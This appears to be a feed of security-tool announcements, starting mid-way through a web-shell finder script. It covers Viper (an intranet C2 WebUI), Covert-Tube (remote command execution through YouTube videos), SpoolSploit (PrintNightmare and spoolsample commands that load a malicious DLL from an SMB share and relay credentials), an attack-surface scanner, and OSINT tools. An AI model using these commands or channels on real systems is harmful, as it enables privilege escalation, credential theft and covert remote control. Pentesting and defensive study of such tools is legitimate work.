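    return sorted(url + path for path, (status, body) in responses.items()
                  if response_matches(status, body, rules))


if __name__ == "__main__":
    print(find_candidates(RULE_LINE, RESPONSES))
```

Only `/system.php` survives: `/c99.php` is dropped by the negated string rule, `/shell.php` by the status rule and `/index.php` by the size bound, which is the combination the sample output above relies on to separate a live shell from a catch-all maintenance page.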

Setting your proxies and custom headers

config.txt

[HEADERS]  # REQUESTS CUSTOM HEADERS, ADD 'OPTION: VALUE'
User-Agent? Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
Referer? bit.ly/THIS_is_PHISHING # Bypass referer protection

[PROXIES]
burp? https://127.0.0.1:8080,http://127.0.0.1:8080

Other features
  1. Filter by regex
  2. Filter by string
  3. Filter by HTTP Status code
  4. Filter by length
  5. Custom Headers
  6. Custom proxy or proxy block for URL file
  7. Multithreading ( custom workers number )


Viper - Intranet Pentesting Tool With Webui

8 October 2021 at 20:30
By: Zion3R


  • Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
  • Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
  • Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
  • Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
  • Viper supports running a native msfconsole in the browser and multi-person collaboration






Website

Installation manual

FAQ

Issues

Modules

System architecture diagram



Development Manual

Source Code
  • viperjs (Frontend)

https://github.com/FunnyWolf/viperjs

  • viperpython (Backend)

https://github.com/FunnyWolf/viperpython

  • vipermsf (MSFRPC)

https://github.com/FunnyWolf/vipermsf


Acknowledgement

Edward_Snowdeng, exp, Fnzer0, qingyun00, 脸谱, NoobFTW, Somd5-小宇, timwhitez, ViCrack, xiaobei97, yumusb



Covert-Tube - Youtube As Covert-Channel - Control Systems Remotely And Execute Commands By Uploading Videos To Youtube

8 October 2021 at 11:30
By: Zion3R


A program to control systems remotely by uploading videos to YouTube, with Python used both to create the videos and to run the listener, emulating some malware I was reading about. It can create videos whose frames contain plain text, QR codes with cleartext, or QR codes whose content is AES-encrypted.


Create a video

The videos are created with generate_video.py: type the commands one per line and enter "exit" to generate the video. By default the video is written to output.avi (configurable in config.py):

python3 generate_video.py



Run the listener and upload the video to Youtube
python3 main.py

The listener will check the Youtube channel every 300 seconds by default (can be updated in config.py). First the video is uploaded:



After finding there is a new video in the channel, it is downloaded and the commands are executed:



We can see the output from the commands:



Configuration

Update the config.py file:

  • channel_id (Mandatory!!!): Get your Youtube channel ID from here.

  • api_key (Mandatory!!!): To get the API key create an application and generate the key from here.

  • image_type (Optional. Default: "qr_aes"): Different types of images for the video.

    • "cleartext" creates images with the words of the commands.
    • "qr" creates QR codes with the commands.
    • "qr_aes" creates QR codes with the commands encrypted with AES.
  • upload_seconds_delay (Optional. Default: 300): Seconds delay until checking if a new video has been uploaded.

  • debug (Optional. Default: True): Print messages or not.

  • aes_key (Optional. Default: "covert-tube_2021"): Key for AES encryption, used in the "qr_aes" option.

  • generated_video_path (Optional. Default: "output.avi"): Path of video generated with generate_video.py.

  • downloaded_video_path (Optional. Default: "/tmp/test.mp4"): Path where the new video will be downloaded.

  • temp_folder (Optional. Default: "/tmp/"): Path where images of every frame from the video are stored, with the format image_X.png.


Installing dependencies

For all the project:

pip3 install Pillow opencv-python youtube_dl pytesseract pyqrcode pypng pyzbar pycrypto

For only the "cleartext" option (OCR):

pip3 install Pillow opencv-python youtube_dl pytesseract

For only the QR without encryption option:

pip3 install Pillow opencv-python youtube_dl pyqrcode pypng pyzbar

For only the QR with AES encryption option:

pip3 install Pillow opencv-python youtube_dl pyqrcode pypng pyzbar pycrypto

Creating a standalone binary
pyinstaller --onefile main.py
cp dist/main covert-tube
rm -rf dist build
rm main.spec

Motivation

Lately I have been reading about malware using YouTube for controlling their settings remotely. For example, Casbaneiro abuses YouTube to store its C&C server domains. Each video on the channels used by the threat actor contains a description and at the end of these there is a link to a bogus Facebook or Instagram URL containing the C&C server domain (WeLiveSecurity blog). A second example is Numando, which abuses it by encrypting the data in the title of the YouTube videos (another WeLiveSecurity post).

Knowing this I decided to create a PoC to test the control of remote systems uploading videos to Youtube but, instead of using the title or the description, using the content of the video. It allows to execute any command, but it could be used to change some settings remotely. So this is just a PoC, use it for educational purposes!



Attack-Surface-Framework - Tool To Discover External And Internal Network Attack Surface

7 October 2021 at 20:30
By: Zion3R


ASF aims to act as an attack surface watchdog for organizations. Given an "Object", which may be a domain, an IP address or a CIDR range (internal or external), ASF discovers assets and subdomains, enumerates their ports and services, tracks deltas, and serves as a continuous, flexible attacking and alerting framework, adding a layer of support against 0-day vulnerabilities that have publicly available PoCs.


Motivation

The lack of support and flexibility for automating the discovery of dynamic assets and their associated vulnerabilities, through continuous scanning or exploitation in a single pane of glass, was the driving force behind ASF. Existing solutions are restricted by the technology or the program they are built for; we wanted a solution that scales and that uses popular open-source security tools to handle the full vulnerability lifecycle.

ASF combines a number of open-source projects into a powerful arsenal of tools wrapped in a single pane of glass behind a GUI. The ASF architecture is illustrated below:



Prerequisites

Latest version of Kali Linux (tested on 64 bits) - https://kali.org/get-kali/

16 GB of RAM at least

1 TB HD - XFS filesystem recommended


Build & Run

As root

  1. git clone https://github.com/vmware-labs/attack-surface-framework.git /opt/asf
  2. cd /opt/asf/
  3. Run ./setup.sh
  4. Assign youruser, email and yourpass

Once the installation is completed

  1. cd /opt/asf/frontend/asfgui/
  2. . bin/activate
  3. python3 manage.py runserver 0.0.0.0:8080 - We recommend to run it on a screen session to leave server persistent (screen -S asf)

Security

ASF is not meant to be publicly exposed. Whether you install it on a cloud provider or on a local instance, we recommend reaching it through SSH port forwarding, for example:

ssh -i "key.pem" -L 8080:127.0.0.1:8080 user@asf-host - For the ASF GUI

ssh -i "key.pem" -L 9045:127.0.0.1:9045 user@asf-host - To access the Graylog2 panel

Then open your browser and go to:

http://127.0.0.1:8080 - For ASF - user:youruser pass:yourpass (provided in initial setup)

https://127.0.0.1:9045 - For Graylog2 - user:admin pass:admin #Change it in /graylog/docker-compose.yaml

Graylog2 requires a few steps to start receiving logs from ASF:

Once logged in, go to System / "Content Packs" and import the content pack located at /opt/asf/tools/graylog/content_pack_ASF.json: click the "Upload" button and you should see "Basic" listed in the "Select Content Packs" section. Click "Basic", make sure the "ASF" radio button is selected and hit "Apply content". This creates the global input that parses the JSON logs, together with the related extractors.



Now you are ready to receive logs from ASF and set up your streams, alerts and dashboards!

More info @ https://docs.graylog.org/en/4.1/


Documentation

ASF has two scopes:

A) External: For your publicly exposed assets.

B) Internal: Assets in your corporate network.

For the External scope, the flow goes through four basic steps:

A.1 Targets - Here is where you input your targets



A.2 Discovery - Module that runs the Amass process to discover publicly exposed assets, feel free to create your configuration file to setup your API keys https://github.com/OWASP/Amass/blob/master/examples/config.ini



A.3 Enumeration - Module that runs the NMAP process to enumerate ports/services and create filters for the Redteam module. Default setup is to look for --top-ports 200 but you can suit it to your needs in /opt/asf/tools/nmap/*.sh



A.4 Redteam - Module that runs submodules located in "/opt/asf/redteam"



Note: For the Internal scope, the flow goes through A.1(Targets),A.3(Enumeration) and A.4(Redteam).


Contributing

The attack-surface-framework project team welcomes contributions from the community. Before you start working with attack-surface-framework, please read our Developer Certificate of Origin. All contributions to this repository must be signed as described on that page. Your signature certifies that you wrote the patch or have the right to pass it on as an open-source patch. For more detailed information, refer to CONTRIBUTING.md.


License

Attack Surface Framework Copyright 2021 VMware, Inc.

The BSD-2 license (the "License") set forth below applies to all parts of the Attack Surface Framework project. You may not use this file except in compliance with the License.

BSD-2 License

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.

Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.


Notice

Attack Surface Framework Copyright 2021 VMware, Inc.

This product is licensed to you under the BSD-2 license (the "License"). You may not use this product except in compliance with the BSD-2 License.

This product may include a number of subcomponents with separate copyright notices and license terms. Your use of these subcomponents is subject to the terms and conditions of the subcomponent's license, as noted in the LICENSE file.


Credits

https://www.djangoproject.com/

https://github.com/creativetimofficial/material-dashboard-django

https://nmap.org/

https://github.com/OWASP/Amass

https://github.com/lanjelot/patator

https://github.com/FortyNorthSecurity/EyeWitness

https://github.com/projectdiscovery/nuclei

https://www.metasploit.com

https://www.kalilinux.org

https://www.graylog.org/products/open-source

https://github.com/wpscanteam/wpscan

https://github.com/vanhauser-thc/thc-hydra

https://nxlog.co/products/nxlog-community-edition

https://www.docker.com/


Presented at Blackhat Arsenal

https://www.blackhat.com/us-21/arsenal/schedule/index.html#vdoberman-24096



SpoolSploit - A Collection Of Windows Print Spooler Exploits Containerized With Other Utilities For Practical Exploitation

7 October 2021 at 11:30
By: Zion3R


A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.


Summary

SpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access.



Getting Started

As of the release date, the SpoolSploit Docker container has been tested successfully on the latest versions of macOS, Ubuntu Linux, and Windows 10.

Although not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a virtual machine that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.


Create and access the SpoolSploit Docker container
  1. Clone this repository
git clone https://github.com/BeetleChunks/SpoolSploit
  2. Build the SpoolSploit Docker container image
cd SpoolSploit
sudo docker build -t spoolsploit .
  3. Create and start the SpoolSploit Docker container
sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
  4. Attach to the container
sudo docker exec -it spoolsploit /bin/bash

Command-line Usage
usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

optional arguments:
-h, --help show this help message and exit
-a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
Attack type to execute on target(s).
-rH RHOST, --rhost RHOST
Remote target IP, CIDR range, or filename (file:<path>)
-rP {139,445}, --rport {139,445}
Remote SMB server port.
-lH LHOST, --lhost LHOST
Listening hostname or IP
-lS LSHARE, --lshare LSHARE
Staging SMB share (UNC)
-d DOMAIN, --domain DOMAIN
Domain for authentication
-u USER, --username USER
Username for authentication
-p PASSWD, --password PASSWD
Password for authentication

Example - spoolsample:
python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

Example - nightmare:
python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

SpoolSample - Capture and relay Windows machine account credentials

The SpoolSploit Docker container includes Responder for relaying machine account hashes obtained from executing the spoolsample attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.



PrintNightmare (CVE-2021-1675) - Execute malicious DLLs on Windows targets as SYSTEM

Included in the SpoolSploit container is an SMB server implemented via Impacket. This server can be used to host malicious DLLs when executing the printnightmare attack in SpoolSploit. The default SMB server settings work, but if you want to customize them you can modify the configuration file located at /home/dlogmas/smbserver/smb-v1.conf.

The only thing you need to do is copy your DLL to the SMB server's share folder in the SpoolSploit container. The share path in the container is /home/dlogmas/smbserver/share/. The following commands demonstrate how to upload a DLL to the SpoolSploit container and make it accessible to the SMB server.

sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'



Disclaimer

This proof-of-concept code has been created for academic research and is not intended to be used against systems except where explicitly authorized. The code is provided as is with no guarantees or promises on its execution. I am not responsible or liable for misuse of this code.


Credits

SpoolSample - Microsoft Feature

PrintNightmare - CVE-2021-1675 / CVE-2021-34527


Smersh - A Pentest Oriented Collaborative Tool Used To Track The Progress Of Your Company'S Missions

6 October 2021 at 20:30
By: Zion3R


Smersh is a pentest oriented collaborative tool used to track the progress of your company's missions and generate reports.


Preview front (Angular):


Documentation

All information is available at the following address: https://docs.smersh.app


How to contribute?

Fork the repository, create a branch, commit and push your work, then open a PR:

git checkout -b MyBranch
git add -p
git commit -m "xx"
git push origin MyBranch

Roadmap
  • Coming soon

Contributors



Scrummage - The Ultimate OSINT And Threat Hunting Framework

6 October 2021 at 11:30
By: Zion3R


VERSION 3.6

  • Code efficiency enhancements and bug fixes for plugins, and improved logging.
  • Significant UI/UX enhancements.
  • Organisation-specific settings and configurations, allowing for predefined searches based on your organisation and its users.
  • Due to the above change, if you are upgrading from version 3.4, a major update has been made to the config.json file. In the installation directory there is a file called "3.6_Upgrade.py": copy your config.json file to this directory and run the script to update it to the latest standard. Running it will create a file called "config_new.json". Keep a backup of your old config.json file, then rename "config_new.json" to "config.json" and move it to the config directory.
  • Over 20 new plugins!
  • API Enhancements and new endpoints for identity management.
  • Please note versions 3.3 - 3.6 entail a major overhaul of a lot of backend and frontend code for improved efficiency. Please don't hesitate to reach out about any code stability issues.

Scrummage is an OSINT tool that centralises search functionality from powerful, yet simple OSINT sites. This project draws inspiration mainly from two other projects, including:

  • The Scumblr project, which, while now deprecated, inspired this concept.
  • The OSINT Framework project, which is a visualisation tool, depicting a range of sites that can be used to search for a variety of things.

While at first glance the web application may not look all that different from Scumblr, the large number of plugins this tool comes with is mainly what makes this project unique; the provided Python/Flask web application is just a simple, lightweight, and scalable way of giving users the ability to manage large pools of results. The other main benefit of this project is a much simpler installation process, which is kept up to date, compared to Scumblr, which is now deprecated.

Any feedback is welcome.

FOR INSTRUCTIONS REFER TO THE WIKI


An Overview of the Web Application

Some of the Many Available Scrummage Plugins
  • Blockchain Search
  • Domain Fuzzer
  • Twitter Scraper
  • Instagram Search
  • Have I Been Pwned Search
  • Ahmia Darkweb Search
  • IP Stack Search
  • Threat Crowd Search
  • Yandex and Naver Search
  • Vkontakte Search
  • Vulners Search
  • Built With Search
  • YouTube Search
  • Many more... Refer to the wiki page here for the full list.

Dashboard

The dashboard is the home screen which the application directs a user to when they log in. It provides a high-level chart showing the number of results for each result type. It does this for each kind of finding. If a graph doesn't load, this is most likely because there are no results in that category, i.e. if there are no closed results, no graph will appear under "Overview of Closed Results".



Events

The events page shows anything that changes within the web application, from logins, to failed login attempts, to any actions performed against a task. This assists with understanding what has recently been happening in the web app, and can assist in matters such as detecting brute-force login attempts or tracking down who altered a task.

Note: This page only loads the latest 1000 events, for optimisation of the web application.
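The two uses the Events page is described as serving, spotting brute-force login attempts and tracking down who altered a task, can also be run as a script over exported events. The following is an added example, not Scrummage's own code; the event field names and the sample records are constructed assumptions, not Scrummage's actual schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events modelled on what the Scrummage Events page lists
# (logins, failed logins, actions against a task). The field names are an
# assumption made for this example, not Scrummage's actual schema.
SAMPLE_EVENTS = [
    {"time": "2021-10-06 09:00:01", "type": "login_failed", "user": "alice", "task": None},
    {"time": "2021-10-06 09:00:09", "type": "login_failed", "user": "alice", "task": None},
    {"time": "2021-10-06 09:00:17", "type": "login_failed", "user": "alice", "task": None},
    {"time": "2021-10-06 09:00:26", "type": "login_failed", "user": "alice", "task": None},
    {"time": "2021-10-06 09:00:34", "type": "login_failed", "user": "alice", "task": None},
    {"time": "2021-10-06 09:01:02", "type": "login", "user": "alice", "task": None},
    {"time": "2021-10-06 08:10:00", "type": "login_failed", "user": "bob", "task": None},
    {"time": "2021-10-06 10:45:00", "type": "login_failed", "user": "bob", "task": None},
    {"time": "2021-10-06 11:00:00", "type": "login", "user": "carol", "task": None},
    {"time": "2021-10-06 11:02:30", "type": "task_edited", "user": "carol", "task": "google"},
    {"time": "2021-10-06 11:03:00", "type": "task_run", "user": "carol", "task": "google"},
]


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Map each user to the highest number of failed logins seen within any
    sliding window of `window` length, keeping only users at or above `threshold`."""
    failed = defaultdict(list)
    for ev in events:
        if ev["type"] == "login_failed":
            failed[ev["user"]].append(_ts(ev))
    flagged = {}
    for user, times in failed.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window start forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[user] = best
    return flagged


def task_history(events, task_name):
    """Chronological (time, user, type) tuples for every event touching a task,
    which is how you track down who altered it."""
    hits = [ev for ev in events if ev.get("task") == task_name]
    return [(ev["time"], ev["user"], ev["type"]) for ev in sorted(hits, key=_ts)]
```

Because the page only loads the latest 1000 events, export or query older events before running this kind of check over a longer period.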



Results

The results page simply shows results that have been created by a task. The results table shows the basic metadata of the result, but also provides a "Details" button which can be used to investigate the result further. As mentioned, all results have some kind of output file; if a result is a link, the file will be a copy of the HTML of the page. Furthermore, screenshot functionality is provided to assist in keeping a photographic record of a result. Both the output and screenshot file will be deleted if the result is deleted.

Note: This page only loads the latest 1000 results, for optimisation of the web application.


For optimisation purposes, the results table only displays some of the general information regarding a result; to investigate a result further, the user should use the Details button. The details page allows the user to view the soft copy of the result's link and provides the ability for a user to generate a screenshot.


Tasks

The tasks page shows all created tasks, and provides the ability for the user to run each task. This page doesn't have a limit on tasks; however, don't go crazy creating tasks, as you can always add a list to a task rather than creating the same task multiple times for one search. So really you shouldn't have any more than 50 tasks. Each task has caching and logging, which can be found in the "protected/output" directory under the task's name, e.g. Google Search is called "google". If you need to remove the cache, you can edit/delete the appropriate cache file.


All the plugins are open-source and free to individuals, just like the rest of the code. Furthermore, feel free to use the pre-existing libraries used in other plugins. If you are creating or editing a plugin, be aware that when you run it for the first time, the web app may reload in order to refresh the Python cache. This is normal.


Account Settings

This page changes according to the user's privileges. If a user is an admin, they have the ability to change their own password as well as other users' passwords; they can block and unblock users, demote and promote users' privileges, and of course create new users and delete existing users.
Additionally, users with administrative privileges can check and edit the input, output, and core configuration of the tool.
The account page looks as per below for administrative users:


The account page looks as per below for non-administrative users:


Identities

This concept was introduced in v3.6 of the Scrummage platform. This page is not to be confused with the Account Settings page: Account Settings is for managing users of the Scrummage platform itself, whereas identities are an entirely optional feature where, if rows are present, the information within can be used when executing tasks.
This is the main page, depicting a table with a faux identity created for documentation purposes:


Identities can be created one of three ways:

  1. Individual creation (Use the "Create Identity" function.)

  2. Bulk upload of identities (Use the "Bulk Upload" function.)

  3. If you have an IDM system in place, you are welcome to onboard straight to the Scrummage database, under the org_identities table. This will help streamline and maintain your list of identities effectively.

Developers

Contributions Welcome!!
We welcome and encourage you to contribute to this project through the creation of new plugins. If you are interested, please refer to the plugin development guide here, which will give you a run-through of how to develop a Scrummage plugin using the custom libraries provided.



โŒ